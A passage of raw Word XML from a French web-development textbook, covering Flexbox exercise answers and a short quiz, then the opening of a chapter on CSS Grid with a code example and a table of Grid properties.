          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La hauteur égale vient de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>align-items: stretch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, valeur par défaut du conteneur flex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin-top: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> absorbe l'espace libre restant et colle le pied en bas, ce qui aligne les pieds entre cartes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 18.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la colonne de descendre sous la largeur de son contenu : un mot long ou une URL suffit à déborder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrections : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la colonne, ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow-wrap: anywhere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le texte longs, ou encore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>word-break: break-word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow: hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> masque le contenu au lieu de le rendre lisible : l'utilisateur perd une partie du texte.</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 xml:space="preserve">Sur quel axe agit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>justify-content</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L'axe secondaire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L'axe principal</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Les deux</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Aucun</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1</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Une largeur de 1 px</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Grandir, rétrécir, base zéro</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Un seul enfant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Une colonne</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Pourquoi un enfant flex refuse-t-il de rétrécir sous son contenu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 xml:space="preserve">À cause de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>flex-basis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 xml:space="preserve">À cause de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>min-width: auto</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 xml:space="preserve">À cause de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gap</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À cause du padding</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Quel modèle choisir pour une mise en page de page complète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Flexbox</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Grid</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Float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Table</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Comment coller un pied de carte en bas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position: absolute</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margin-top: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un conteneur colonne</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vertical-align: bottom</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padding-top: 100%</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>justify-content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> répartit sur l'axe principal, dont le sens dépend de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-direction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> équivaut à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex: 1 1 0%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : l'élément prend une part égale de l'espace disponible.</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La valeur initiale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width: auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> impose la taille minimale du contenu ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lève cette contrainte.</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Grid gère deux axes simultanément, ce qui correspond à la structure globale d'une page.</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Dans un conteneur flex en colonne, une marge automatique en haut absorbe l'espace libre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>19. CSS Grid : structurer la page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Déclarer une grille plutôt que d'empiler des marges : la mise en page devient lisible dans le code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 18</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Définir des colonnes et des lignes explicites ou implicites.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Placer des éléments par ligne, par nom ou par zone.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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>minmax()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto-fit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>repeat()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à bon escient.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Construire une mise en page complète et responsive.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Éviter les pièges de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et des grilles imbriquées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>19.1 Déclarer une grille</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Grid divise un conteneur en cellules selon deux axes. Contrairement à Flexbox, la structure est déclarée sur le conteneur, ce qui rend la mise en page lisible avant même de regarder les enfants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une page en trois lignes et deux colonnes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.page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: 16rem minmax(0, 1fr);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-rows: auto 1fr auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-height: 100dvh;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2476500"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f27.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.27 — Les trois notions de Grid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.62 — Sept propriétés de Grid</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9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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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326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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid-template-columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonnes explicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>repeat(3, 1fr)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>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grid-template-rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Lignes explicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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auto 1fr auto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid-auto-rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hauteur des lignes implicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minmax(6rem, auto)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>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gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Espacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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1rem 2rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid-column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Placement en colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1 / 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>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grid-row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Placement en lignes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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2 / span 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid-template-areas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Zones nommées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"entete entete"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PISTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une colonne ou une ligne de la grille. Les pistes explicites sont déclarées ; les pistes implicites sont créées automatiquement pour accueillir les éléments supplémentaires.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
